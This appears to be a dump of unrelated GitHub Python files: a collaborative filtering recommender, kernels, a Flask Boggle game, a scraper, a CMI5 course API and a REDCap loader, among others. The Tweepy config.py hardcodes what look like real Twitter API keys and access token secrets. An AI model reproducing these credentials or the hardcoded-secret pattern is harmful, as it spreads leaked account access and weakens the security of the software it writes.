sim[u][v] = 0\n sim[u][v] += 1\n\n # 计算用户相似度矩阵 step2\n # 用户协同过滤矩阵其实相当于是余弦相似度的分子部分,还需要除以分母,即两个用户分别交互的item数量的乘积\n # 两个用户分别交互的item数量的乘积就是上面统计的num字典\n print('计算相似度...')\n for u, users in tqdm(sim.items()):\n for v, score in users.items():\n sim[u][v] = score / math.sqrt(num[u] * num[v]) # 余弦相似度分母部分 \n \n\n # 对验证数据中的每个用户进行TopN推荐\n # 在对用户进行推荐之前需要先通过相似度矩阵得到与当前用户最相似的前K个用户,\n # 然后对这K个用户交互的商品中除当前测试用户训练集中交互过的商品以外的商品计算最终的相似度分数\n # 最终推荐的候选商品的相似度分数是由多个用户对该商品分数的一个累加和\n print('给测试用户进行推荐...')\n rec_dict = {}\n for u, _ in tqdm(val_users.items()): # 遍历测试集用户,给测试集中的每个用户进行推荐\n rec_dict[u] = {} # 初始化用户u的候选item的字典\n for v, score in sorted(sim[u].items(), key=lambda x: x[1], reverse=True)[:K]: # 选择与用户u最相似的k个用户\n for item in tra_users[v]: # 遍历相似用户之间交互过的商品\n if item not in tra_users[u]: # 如果相似用户交互过的商品,测试用户在训练集中出现过,就不用进行推荐,直接跳过\n if item not in rec_dict[u]:\n rec_dict[u][item] = 0 # 初始化用户u对item的相似度分数为0\n rec_dict[u][item] += score # 累加所有相似用户对同一个item的分数\n \n print('为每个用户筛选出相似度分数���高的N个商品...')\n if not N:\n Top50_rec_dict = {k: sorted(v.items(), key=lambda x: x[1], reverse=True)[:50] for k, v in rec_dict.items()}\n Top50_rec_dict = {k: list([x[0] for x in v]) for k, v in Top50_rec_dict.items()}\n Top10_rec_dict = {k: v[:10] for k, v in Top50_rec_dict.items()}\n Top20_rec_dict = {k: v[:20] for k, v in Top50_rec_dict.items()}\n return Top10_rec_dict, Top20_rec_dict, Top50_rec_dict, rec_dict\n else:\n rec_dict = {k: sorted(v.items(), key=lambda x: x[1], reverse=True)[:N] for k, v in rec_dict.items()}\n rec_dict = {k: list([x[0] for x in v]) for k, v in rec_dict.items()}\n return rec_dict\n\ndef save_rec_dict(save_path,rec_dict):\n pickle.dump(rec_dict, open(os.path.join(save_path,'UserCF_rec_dict.txt'), 'wb'))\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--TopN', type=int, default=0, help='number of top score items selected')\n parser.add_argument('--TopK', type=int, default=100, help='number of similar items/users')\n parser.add_argument('--rmse', action='store_true', help='number of similar items/users')\n args = parser.parse_args()\n\n train_users, valid_users = load_data(file_path='./data')\n\n if not args.TopN:\n Top10_rec_dict, Top20_rec_dict, Top50_rec_dict, rec_dict = Cosine_UserCF(train_users, valid_users, args.TopK ,args.TopN)\n print('Top 10:')\n rec_eval(Top10_rec_dict,valid_users,train_users)\n print('Top 20:')\n rec_eval(Top20_rec_dict,valid_users,train_users)\n 
print('Top 50:')\n rec_eval(Top50_rec_dict,valid_users,train_users)\n save_rec_dict('./data',rec_dict)\n print('Done.')\n else:\n rec_dict = Cosine_UserCF(train_users, valid_users, args.TopK ,args.TopN)\n print(f'Top {args.TopN}:')\n rec_eval(rec_dict,valid_users,train_users)\n print('Done.')\n","repo_name":"Guadzilla/Basics-of-Recsys","sub_path":"task9/UserCF.py","file_name":"UserCF.py","file_ext":"py","file_size_in_byte":6770,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"70418778890","text":"class RBF(Kernel):\n\n def __init__(self, sigma: float = 1.0):\n self.sigma = sigma\n\n def kernel(self, X, Y):\n X = np.array(X)\n Y = np.array(Y)\n\n if X.ndim == 1 and Y.ndim == 1:\n norm = np.sum((X - Y) ** 2)\n elif X.ndim == 1:\n norm = np.sum((X[None, :] - Y) ** 2, axis=1)\n elif Y.ndim == 1:\n norm = np.sum((X - Y[None, :]) ** 2, axis=1)\n else:\n norm = np.sum((X[..., :, None, :] -\n Y[..., None, :, :]) ** 2, axis=-1)\n return np.exp(-norm / (2 * self.sigma**2))\n\n\nclass Linear(Kernel):\n\n def kernel(self, X, Y):\n X = np.array(X)\n Y = np.array(Y)\n\n if X.ndim == 1 and Y.ndim == 1:\n return X * Y\n elif X.ndim == 1:\n return Y @ X\n elif Y.ndim == 1:\n return X @ Y\n else:\n return np.einsum(\"...id,...jd->...ij\", X, Y)\n","repo_name":"gbelouze/mva-kernel-hw3","sub_path":"reports/snippets/ex1_q2a.py","file_name":"ex1_q2a.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70682033607","text":"from curses import reset_prog_mode, reset_shell_mode\nfrom boggle import Boggle\nfrom flask import Flask, request, render_template, session, redirect, jsonify\n\napp = Flask(__name__)\n\napp.config['SECRET_KEY'] = \"secret\"\n\nboggle_game = Boggle()\n\n@app.route('/')\ndef index():\n \"\"\"Show homepage.\"\"\"\n boggle_board = boggle_game.make_board()\n session[\"boggle_board\"] = boggle_board\n highscore = session.get(\"highscore\", 0)\n nplays = session.get(\"nplays\", 0)\n return render_template(\"index.html\", board = boggle_board, highscore=highscore, nplays=nplays)\n\n@app.route('/guess')\ndef submit_guess():\n \"\"\"User submits guess\"\"\"\n word = request.args.get(\"word\")\n board = session[\"boggle_board\"]\n result = boggle_game.check_valid_word(board, word)\n return jsonify(result=result)\n\n@app.route('/submit-score', methods=[\"POST\"])\ndef save_game():\n \"\"\"User saves game stats\"\"\"\n score = request.json[\"score\"]\n highscore = session.get(\"highscore\", 0)\n nplays = session.get(\"nplays\", 0)\n session['nplays'] = nplays + 1\n session['highscore'] = max(score, highscore)\n return jsonify(brokeRecord=score > highscore)\n\n@app.route('/end-game')\ndef restart_game():\n \"\"\"re-initiates game\"\"\"\n return redirect('/')","repo_name":"erichard413/Boggle","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12130162264","text":"#Python program to check a String is palindrome or not\r\nstr1 = input(\"Enter a string\")\r\nstr1 = str1.lower().replace(\" \", \"\")\r\nrev_str1 = \"\"\r\n\r\nfor i in range(len(str1)-1, -1, -1):\r\n rev_str1 += str1[i]\r\n\r\nif rev_str1 == str1:\r\n print(f\"{str1} is a Palindrome\")\r\nelse:\r\n print(f\"{str1} is not a 
Palindrome\")","repo_name":"Manasa-Shivarudra/Python-DataStructures-and-Coding","sub_path":"Strings/palindromeforloop.py","file_name":"palindromeforloop.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"40965367090","text":"# -*- coding: utf-8 -*-\n\nfrom jinja2 import TemplateNotFound\nfrom flask import Blueprint, render_template, abort\n\nadmin = Blueprint('admin', __name__)\n\n@admin.route('/')\ndef defalut():\n try:\n return render_template('admin/default.html')\n except TemplateNotFound:\n abort(404)\n","repo_name":"tottily/terabithia","sub_path":"river/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4843371999","text":"\"\"\"\r\nTask 1\r\n\r\nFizzBuzz has been used as a common challenge during programmer interviews, it requires the\r\ninterviewee to write code that prints the numbers between 1 and 100 with the following rules:\r\n\r\n•If a number is divisible by 3, print “Fizz”\r\n•If a number is divisible by 5, print “Buzz”\r\n•If a number is divisible by both 3 and 5, print “FizzBuzz”\r\n•Otherwise, print the number\r\n\r\nImplement a function that will work through FizzBuzz for the specified number range. Your program\r\nshould ask the user for a high and low value before running the function.\r\n\r\nSave your program as ex10.py.\r\n\r\n\"\"\"\r\n\r\n#should ask the user for a high and low value before running the function.\r\n#value = input(int(Enter a value betwwen 0(low) and 100(high)))\r\n\r\n\r\n#function\r\ndef FizzBuzz (low,high):\r\n for num in range(low,high):\r\n if num%3==0 and num%5==0:\r\n print(\"FizzBuzz\")\r\n elif num%3==0:\r\n print(\"Fizz\")\r\n elif num%5==0:\r\n print(\"Buzz\")\r\n else:\r\n print(num)\r\n\r\nFizzBuzz(1,100)\r\n","repo_name":"IMDCGP105-1819/portfolio-s184286","sub_path":"python ex10.py","file_name":"python ex10.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"905268394","text":"import tweepy\r\nimport logging\r\nimport os\r\n\r\nlogger = logging.getLogger()\r\n\r\ndef create_api():\r\n consumer_key = \"n4QQQaLtC70dsi54adwRuFMCW\"\r\n consumer_secret = \"GrsLdf2drgLFkT8FpFzPeLrBrFTFlHY4LN6h7EiVamY7GefiHE\"\r\n access_token = \"1377622154683019265-wB6k2RuIfNGcth52wDEO6bGPnzyXYw\"\r\n access_token_secret = \"8RTqizUFIrmg7LAAawJXDwZF7w1qHoPdypvpIRYd6ji5B\"\r\n\r\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\r\n auth.set_access_token(access_token, access_token_secret)\r\n api = tweepy.API(auth, wait_on_rate_limit=True, \r\n wait_on_rate_limit_notify=True)\r\n try:\r\n api.verify_credentials()\r\n except Exception as e:\r\n logger.error(\"Error creating API\", exc_info=True)\r\n raise e\r\n logger.info(\"API created\")\r\n return api","repo_name":"PaulBagnis/TweetBot","sub_path":"tweepy-bots/bots/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"37928147272","text":"import globalVars as g\r\nfrom entityClass import Entity\r\n\r\nclass Player(Entity):\r\n def __init__(self, x, y, r, c):\r\n super().__init__(x, y, r, c)\r\n self.speed = 3\r\n\r\n def update(self, direction, render):\r\n self.movement(direction)\r\n game_over = self.zombieCollision()\r\n 
self.draw(render)\r\n return game_over\r\n\r\n def zombieCollision(self):\r\n game_over = False\r\n for z in g.zombies:\r\n if g.dist(self,z) <= self.r + z.r:\r\n g.loss = True\r\n game_over = True\r\n return game_over\r\n\r\n def movement(self, direction):\r\n self.vel = {'x': direction['x']*self.speed, 'y': direction['y']*self.speed}\r\n\r\n self.normalizeSpeed()\r\n\r\n if self.x + self.r + self.vel['x'] > g.gameWidth or self.x - self.r + self.vel['x'] < 0:\r\n self.vel['x'] = 0\r\n if self.y + self.r + self.vel['y'] > g.gameHeight or self.y - self.r + self.vel['y'] < 0:\r\n self.vel['y'] = 0\r\n\r\n \r\n self.x += self.vel['x']\r\n self.y += self.vel['y']\r\n g.cameraX += self.vel['x']\r\n g.cameraY += self.vel['y']\r\n \r\n\r\n","repo_name":"BenWillis0/actor-critic","sub_path":"playerClass.py","file_name":"playerClass.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"1569580225","text":"import numpy as np\nimport os\n\ndef walkFile(file):\n fileList = []\n for root, dirs, files in os.walk(file):\n for f in files:\n fileList.append(os.path.join(root, f))\n return fileList\n\nfileList1=walkFile(\"Normal\")\nfileList2=walkFile(\"Crackle\")\nfileList3=walkFile(\"Wheeze\")\nfileList4=walkFile(\"Crackle_Wheeze\")\n\nimport librosa\ndef get_feature(filelist):\n features=[]\n for i in filelist:\n wav, sample_rate = librosa.load(i, sr=19063)\n mel_spec = librosa.feature.melspectrogram(wav, sample_rate, n_fft=2048, hop_length=512, n_mels=224)\n logmel_spec = librosa.power_to_db(mel_spec)\n logmel_spec=logmel_spec.T\n logmel_spec=np.reshape(logmel_spec,(224,224,1))\n logmel_spec=np.concatenate((logmel_spec,logmel_spec,logmel_spec),axis=-1)\n features.append(logmel_spec)\n return features\n\nfrom threading import Thread\nclass MyThread2(Thread):\n def __init__(self,fileListName):\n Thread.__init__(self)\n self.fileList=fileListName\n\n def run(self):\n self.result = get_feature(self.fileList)\n\n def get_result(self):\n return self.result\n\nMythd1 = MyThread2(fileList1)\nMythd2 = MyThread2(fileList2)\nMythd3 = MyThread2(fileList3)\nMythd4 = MyThread2(fileList4)\n\nMythd1.start()\nMythd2.start()\nMythd3.start()\nMythd4.start()\n\nMythd1.join()\nMythd2.join()\nMythd3.join()\nMythd4.join()\n\nfeatures1=Mythd1.get_result()\nfeatures2=Mythd2.get_result()\nfeatures3=Mythd3.get_result()\nfeatures4=Mythd4.get_result()\n\nnp.save('Feature_CNN_Normal.npy',features1)\nnp.save('Feature_CNN_Crackle.npy',features2)\nnp.save('Feature_CNN_Wheeze.npy',features3)\nnp.save('Feature_CNN_Crackle&Wheeze.npy',features4)\n","repo_name":"Epyoyo/LSR-Net","sub_path":"GetCNNFeature.py","file_name":"GetCNNFeature.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5708801490","text":"__author__ = 'one'\n\nfrom openerp import models, api, fields, _\n\n\nclass ModelImport(models.TransientModel):\n _name = 'builder.website.asset.data.wizard'\n\n module_id = fields.Many2one('builder.ir.module.module', 'Module', ondelete='CASCADE')\n data_ids = fields.Many2many('builder.data.file', 'builder_website_asset_data_file_rel', 'wizard_id', 'data_id', 'Files')\n\n @api.one\n def action_import(self):\n asset_model_name = self.env.context.get('asset_model', 'builder.website.asset.item')\n model = self.env[self.env.context.get('active_model')].search([('id', '=', self.env.context.get('active_id'))])\n asset_item_model = 
self.env[asset_model_name]\n model_field = self.env.context.get('model_link_field', 'asset_id')\n asset_field = self.env.context.get('asset_field', 'file_id')\n\n for data_file in self.data_ids:\n current_file = self.env[asset_model_name].search([(model_field, '=', model.id), (asset_field, '=', data_file.id)])\n\n if not current_file.id:\n new_item = asset_item_model.create(dict(((model_field, model.id), (asset_field, data_file.id))))\n\n return {'type': 'ir.actions.act_window_close'}","repo_name":"f3ktr/BuilderOdooModule","sub_path":"builder/wizard/website_asset_bulk_add.py","file_name":"website_asset_bulk_add.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"30207069955","text":"from selenium import webdriver\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n\nclass Naver_movie(object):\n\n url = 'https://movie.naver.com/movie/sdb/rank/rmovie.nhn'\n class_code = ''\n driver_path = 'C:/Program Files/Google/Chrome/chromedriver'\n movie_title = []\n dict = {}\n df = None\n\n def scrap(self):\n driver = webdriver.Chrome(self.driver_path)\n driver.get(self.url)\n soup = BeautifulSoup(driver.page_source, 'html.parser')\n all_div = soup.find_all('div', {\"class\": self.class_code})\n #for loop 사용, comprehention 사용\n for i in all_div:\n self.movie_title.append(i.find(\"a\").text)\n driver.close()\n\n def insert_dict(self):\n for i in range(0, len(self.movie_title)):\n self.dict[i+1] = self.movie_title[i]\n\n def insert_dataframe(self):\n self.df = pd.DataFrame.from_dict(self.dict, orient='index')\n print(self.df)\n\n def make_csv(self):\n path = './data/movieRanking.csv'\n self.df.to_csv(path, sep=',', na_rep='Nan')\n\n\nif __name__ == '__main__':\n naver = Naver_movie()\n naver.class_code = input(\"input tit3\")\n naver.scrap()\n naver.insert_dict()\n naver.insert_dataframe()\n naver.make_csv()","repo_name":"DJSull93/django-sull","sub_path":"webscrap/naver_movie.py","file_name":"naver_movie.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"10147616314","text":"class Solution(object):\n def maxDotProduct(self, nums1, nums2):\n \"\"\"\n :type nums1: List[int]\n :type nums2: List[int]\n :rtype: int\n \"\"\"\n dp = [[0 for _ in range(len(nums2) + 1)] for _ in range(len(nums1) + 1)]\n # m->nums1 n->nums2 DP[m][n] index count from 1\n\n for n in range(len(nums2) + 1):\n if n == 0:\n for mm in range(len(nums1) + 1):\n dp[mm][n] = -1000000\n else:\n opt = -1000000\n for m in range(len(nums1) + 1):\n if m == 0:\n dp[m][n] = -1000000\n continue\n\n dp[m][n]=max(dp[m - 1][n - 1] + nums1[m - 1] * nums2[n - 1],nums1[m - 1] * nums2[n - 1],dp[m - 1][n],dp[m][n - 1])\n\n\n\n\n\n return dp[len(nums1)][len(nums2)]\n\ns=Solution()\nprint(s.maxDotProduct([-5,-1,-2],[3,3,5,5]))","repo_name":"ElegyTsai/LeetCode-1st-round","sub_path":"1458. Max Dot Product of Two Subsequences.py","file_name":"1458. 
Max Dot Product of Two Subsequences.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"22452929757","text":"import re\n\n# Use day_dict and is_leap_year in your tomorrow function\n\nday_dict ={ 1 : 31,\n 2 : 28,\n 3 : 31,\n 4 : 30,\n 5 : 31,\n 6 : 30,\n 7 : 31,\n 8 : 31,\n 9 : 30,\n 10 : 31, \n 11 : 30,\n 12 : 31} \n\ndef is_leap_year(year:int)->bool:\n return (year%4 == 0 and year%100 != 0) or year%400==0\n\ndef days_in(month:int,year:int)->int:\n return (29 if month==2 and is_leap_year(year) else day_dict[month])\n\n\ndef tomorrow(date:str)->str:\n pass\n\n\n\nif __name__ == '__main__':\n import driver, prompt,traceback\n while True:\n date = prompt.for_string('Enter a date to test (quit to start driver)')\n if date == 'quit':\n break;\n try:\n print('tomorrow=',tomorrow(date))\n except:\n print('tomorrow raised exception')\n traceback.print_exc()\n \n driver.driver()\n","repo_name":"ztza/Class-Projects","sub_path":"Python/Quizez/q2helper/q2solution.py","file_name":"q2solution.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36654868147","text":"from setuptools import find_packages, setup\n\nwith open(\"rl_kerning/__init__.py\") as f:\n for line in f:\n if line.find(\"__version__\") >= 0:\n version = line.split(\"=\")[1].strip()\n version = version.strip('\"')\n version = version.strip(\"'\")\n break\n\nwith open(\"README.md\") as f:\n readme = f.read()\n\nwith open(\"requirements.txt\") as f:\n requirements = f.readlines()\n\nwith open(\"requirements-dev.txt\") as f:\n requirements_dev = f.readlines()\n\nsetup_args = dict(\n name=\"rl_kerning\",\n version=version,\n description=\"HarfBuzz kerning / ligatures for Reportlab\",\n long_description=readme,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/gvellut/rl_kerning\",\n author=\"Guilhem Vellut\",\n author_email=\"g@vellut.com\",\n license=\"MIT\",\n classifiers=[\n \"Development Status :: 3 - Alpha\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: Information Technology\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python :: 3\",\n \"Operating System :: OS Independent\",\n \"Topic :: Printing\",\n ],\n keywords=\"reportlab pdf publishing book\",\n packages=find_packages(exclude=[\"docs\", \"tests\"]),\n install_requires=requirements,\n extras_require={\"dev\": requirements_dev},\n project_urls={\n \"Bug Reports\": \"https://github.com/gvellut/rl_kerning/issues\",\n \"Source\": \"https://github.com/gvellut/rl_kerning\",\n },\n)\n\nsetup(**setup_args)\n","repo_name":"gvellut/rl_kerning","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"11295315571","text":"from uuid import UUID\n\nfrom fastapi import (\n APIRouter,\n Body,\n Depends,\n File,\n HTTPException,\n UploadFile,\n)\n\nfrom modules.courses.schema import (\n CMICourseRead,\n CMICoursesBase,\n CMIEnrollementCreate,\n CMIEnrollementRead,\n)\nfrom modules.courses.service import CMICourseService, CourseDTO\nfrom modules.users.services import UserService\nimport logging\nfrom shared.utils import extract_zip\nfrom storage.storage import IStorage, LocalStorage\nfrom shutil import rmtree\nimport os.path\n\nlogger = logging.getLogger(__name__)\n\ncourses_router 
= APIRouter(tags=[\"courses\"], prefix=\"/api/courses\")\n\n\n@courses_router.post(\n \"\", response_model=CMICourseRead, name=\"courses:create_cmi5_course\"\n)\nasync def create_cmi5_course(\n title: str = Body(..., description=\"Course Title\"),\n description: str = Body(..., description=\"Course Description\"),\n file: UploadFile = File(...),\n cmi_course_service: CMICourseService = Depends(CMICourseService),\n storage: IStorage = Depends(LocalStorage),\n):\n \"\"\"Create CMI5 Course\"\"\"\n\n content_type = \"\"\n\n if file.content_type in (\n \"application/zip\",\n \"application/octet-stream\",\n \"application/x-zip-compressed\",\n ):\n content_type = \"zip\"\n else:\n raise HTTPException(\n detail=\"Uploading Failed: Bad archive or file\",\n status_code=400,\n )\n\n folder_path = extract_zip(file)\n\n if content_type == \"zip\" and not os.path.exists(f\"{folder_path}/cmi5.xml\"):\n rmtree(folder_path)\n raise HTTPException(\n detail=\"Failed to retrieve course structure data from zip: not found cmi5.xml file\",\n status_code=400,\n )\n\n file_path = storage.save_course_folder(folder_path)\n\n data = CourseDTO(\n title=title,\n description=description,\n file_path=os.path.join(file_path, \"res/index.html\"),\n )\n\n course = await cmi_course_service.create(data)\n # delete local folder after uploading scorm course on s3 bucket\n rmtree(folder_path)\n return course\n\n\n@courses_router.get(\n \"/all\", response_model=list[CMICoursesBase], name=\"courses:get_cmi5_all_courses\"\n)\nasync def get_cmi5_all_courses(\n cmi_course_service: CMICourseService = Depends(CMICourseService),\n):\n \"\"\"Get all courses\"\"\"\n\n courses = await cmi_course_service.get_all()\n\n return courses\n\n\n@courses_router.get(\n \"/{course_id}\", response_model=CMICourseRead, name=\"courses:get_cmi5_course\"\n)\nasync def get_cmi5_course(\n course_id: UUID,\n cmi_course_service: CMICourseService = Depends(CMICourseService),\n):\n \"\"\"Get course with users by this course\"\"\"\n\n course = await cmi_course_service.get_by_id(course_id)\n\n if not course:\n raise HTTPException(detail=\"Курс не найден\", status_code=404)\n\n course = CMICourseRead.from_orm(course)\n course.users = await cmi_course_service.get_users(course)\n\n return course\n\n\n@courses_router.post(\n \"/enrollment\",\n name=\"courses:set_enrollment\",\n response_model=CMIEnrollementRead,\n)\nasync def set_enrollment(\n data: CMIEnrollementCreate,\n user_service: UserService = Depends(UserService),\n cmi_course_service: CMICourseService = Depends(CMICourseService),\n):\n \"\"\"Assign course on user\"\"\"\n course = await cmi_course_service.get_by_id(data.course_id)\n if not course:\n raise HTTPException(detail=\"Курс не найден\", status_code=404)\n\n user = await user_service.get_by_id(data.user_id)\n\n if not user:\n raise HTTPException(detail=\"Пользователь не найден\", status_code=404)\n\n enrollment = await cmi_course_service.get_enrollment(course.id, user.id)\n\n if enrollment:\n raise HTTPException(\n detail=\"Курс уже назначен на пользователя\",\n status_code=400,\n )\n\n enrollment = await cmi_course_service.set_enrollment(course, user)\n return enrollment\n","repo_name":"samuraii-company/cmi5-backend-demo-for-test","sub_path":"modules/courses/router.py","file_name":"router.py","file_ext":"py","file_size_in_byte":3951,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"13116488423","text":"import os\nimport io\nimport pandas as pd\nimport requests\nfrom ccf.box import 
CachedBox\nfrom ccf.easy_yaml import EasyYaml\nfrom ccf.redcap import CachedRedcap\nfrom ccf.config import LoadSettings\n\nconfig = LoadSettings()\n\nclass Loader:\n\n def __init__(self, name):\n self.name = name\n self.setup()\n\n def setup(self):\n \"\"\"\n Use this function to load data dictionaries or any other file that will\n aid in interpreting fields for creating shadow dataframes later on.\n \"\"\"\n pass\n\n def get_source_name(self):\n return self.name\n\n def _fields_hook_(self, fields):\n \"\"\"\n Use this function to add sepcial fields that are not explicitly\n described in the yaml map files. (names not renames)\n \"\"\"\n return fields\n\n def _load_hook_(self, fields):\n \"\"\"\n Implements the actual loading of the data.\n \"\"\"\n return pd.DataFrame()\n\n def _post_load_hook_(self, df):\n \"\"\"\n Manipulate the dataframe to create additional or rename existing fields.\n This is also a good place to merge additional data.\n \"\"\"\n filename = config['rosetta']['filename']\n rosetta=pd.read_csv(filename)\n rosetta = rosetta[['REDCap_id','subject', 'redcap_event','pseudo_guid', 'M/F', 'nda_interview_date', 'nda_age']]\n rosetta.columns = ['id','subject', 'redcap_event','subjectkey', 'gender', 'interview_date', 'interview_age']\n df = rosetta.merge(df, on=['subject','redcap_event'], suffixes=('', '_alt'))\n df['source'] = self.name\n\n return df\n\n def _detect_missing_fields_hook_(self, df, fields):\n \"\"\"\n Notify the user if any of the requested fields are missing or unavailable.\n \"\"\"\n diff = set(fields).difference(df.columns)\n if diff:\n print(self.name, 'Some columns were unavailable: ', diff)\n\n return diff\n\n def _create_shadow_dataframe(self, df, fields):\n \"\"\"\n Create a shadow dataframe which for example contains the text\n labels for coded fields.\n \"\"\"\n return df.copy(), df.copy()\n\n def load(self, fields):\n \"\"\"\n The main function that runs through all of the above functions in order.\n \"\"\"\n additional_fields = self._fields_hook_(fields)\n df = self._load_hook_(additional_fields)\n df = self._post_load_hook_(df)\n self._detect_missing_fields_hook_(df, fields)\n df, DF = self._create_shadow_dataframe(df, fields)\n df = df.replace('nan', pd.NA)\n DF = DF.replace('nan', '').fillna('')\n print('Shape of loaded data',df.shape)\n return df, DF\n\n\nclass BoxLoader(Loader):\n def __init__(self, name, boxid):\n self.boxid = boxid\n self.box = CachedBox(cache='./')\n super().__init__(name)\n\n def _load_hook_(self, fields):\n df = self.box.read_csv(self.boxid)\n return df\n\n def _post_load_hook_(self, df):\n fromnames = LoadSettings()['Redcap']['datasources'][self.get_source_name()]['events']\n df = df[df.assessment.isin(fromnames)]\n df = df.rename(columns={\"subid\": \"subject\"})\n df['redcap_event']=df.assessment\n return super()._post_load_hook_(df)\n\n\nclass BoxHcdLoader(BoxLoader) :\n def _post_load_hook_(self, df):\n df = super()._post_load_hook_(df)\n df = df[df.subject.str.startswith('HCD', False)]\n return df\n\n\nclass BoxHcaLoader(BoxLoader) :\n def _post_load_hook_(self, df):\n df = super()._post_load_hook_(df)\n df = df[df.subject.str.startswith('HCA', False)]\n return df\n\n\nclass RedcapLoader(Loader):\n def __init__(self, name, definitions_dir=\"./definitions/\"):\n self.directory = definitions_dir\n self.definitions = {}\n super().__init__(name)\n\n def setup(self):\n filename = os.path.join(self.directory, self.name + '.yaml')\n Y = EasyYaml()\n self.definitions = Y(filename)\n\n def _load_hook_(self, fields):\n redcap = 
CachedRedcap()\n df = redcap.get_behavioral(self.get_source_name(), list(fields))\n renames = LoadSettings()['Redcap']['datasources'][self.get_source_name()]['event_names']\n fromnames = LoadSettings()['Redcap']['datasources'][self.get_source_name()]['events']\n a = dict(zip(fromnames, renames))\n df[\"redcap_event\"] = df['redcap_event_name'].map(a)\n backfill = df.loc[df.redcap_event == 'V1'][['id', 'subject']] #only V1 has subject identifiers\n df = pd.merge(df.drop(columns='subject'), backfill, how='left', on='id')\n return df\n\n def _detect_missing_fields_hook_(self, df, fields):\n # Add checkbox fields\n extended_fieldslist = []\n for name in fields:\n d = self.definitions.get(name)\n if d and d['type'] == 'checkbox':\n extended_fieldslist.extend([f'{name}___{k}' for k, v in d['choices'].items()])\n else:\n extended_fieldslist.append(name)\n\n return super()._detect_missing_fields_hook_(df, extended_fieldslist)\n\n def _create_shadow_dataframe(self, df, fields):\n df = df.copy()\n DF = df.copy()\n\n for name in fields:\n if name not in self.definitions:\n # if not in data dictionary, then won't know how to manipulate so just skip\n continue\n\n field = self.definitions.get(name)\n\n if field['type'] == 'checkbox':\n replace_with_code = {f'{name}___{k}': k for k, v in field['choices'].items()}\n replace_with_value = {f'{name}___{k}': v for k, v in field['choices'].items()}\n\n z = df[replace_with_code.keys()].stack()\n z = z[z == 1].reset_index(level=1).rename(columns={'level_1': name}).drop(columns=0)\n\n x = z.replace(replace_with_value).groupby(level=0).agg(lambda values: '; '.join(values))\n X = z.replace(replace_with_code).groupby(level=0).agg(lambda values: '; '.join(values))\n\n elif name in df:\n x = df[name].copy()\n if field['type'] in ['radio', 'dropdown']:\n X = x.replace({float(k): v for k, v in field['choices'].items()})\n elif field['type'] in ['text']:\n X = x.astype(str)\n else:\n X = x.copy()\n else:\n x = pd.Series()\n X = pd.Series()\n df[name] = x\n DF[name] = X\n\n return df, DF\n\n\nclass ParentLoader(RedcapLoader):\n def __init__(self, name, definitions_dir=\"./definitions/\"):\n super().__init__('parent', definitions_dir)\n\n def _fields_hook_(self, fields):\n return fields + ['child_id']\n\n def _post_load_hook_(self, df):\n df = df \\\n .drop(columns=['subjectid']) \\\n .rename(columns={'child_id': 'subjectid'})\n\n df[['subject', 'flagged']] = df.subjectid.str.split('_', 1, expand=True)\n\n # remove withdrawn\n df = df[df.flagged.isna()]\n\n return super()._post_load_hook_(df)\n\n\nclass QintLoader(RedcapLoader):\n def __init__(self, definitions_dir=\"./definitions/\"):\n super().__init__('qint', definitions_dir)\n\n def _fields_hook_(self, fields):\n return fields + ['subjectid', 'visit']\n\n def _load_hook_(self, fields):\n redcap = CachedRedcap()\n exclude = ['subject', 'subjectkey', 'gender', 'interview_date', 'interview_age']\n fields = [x for x in fields if x not in exclude]\n df = redcap(self.get_source_name(), fields)\n renames = LoadSettings()['Redcap']['datasources'][self.get_source_name()]['event_names']\n fromnames = LoadSettings()['Redcap']['datasources'][self.get_source_name()]['visit']\n a = dict(zip(list(map(str, fromnames)), renames))\n df[\"redcap_event\"] = df['visit'].map(a)\n return df\n\n def _post_load_hook_(self, df):\n visit = config['Redcap']['datasources'][self.get_source_name()]['visit']\n df = df[df.visit.isin(list(map(str, visit)))]\n df = df.rename(columns={\"subjectid\": \"subject\"})\n return 
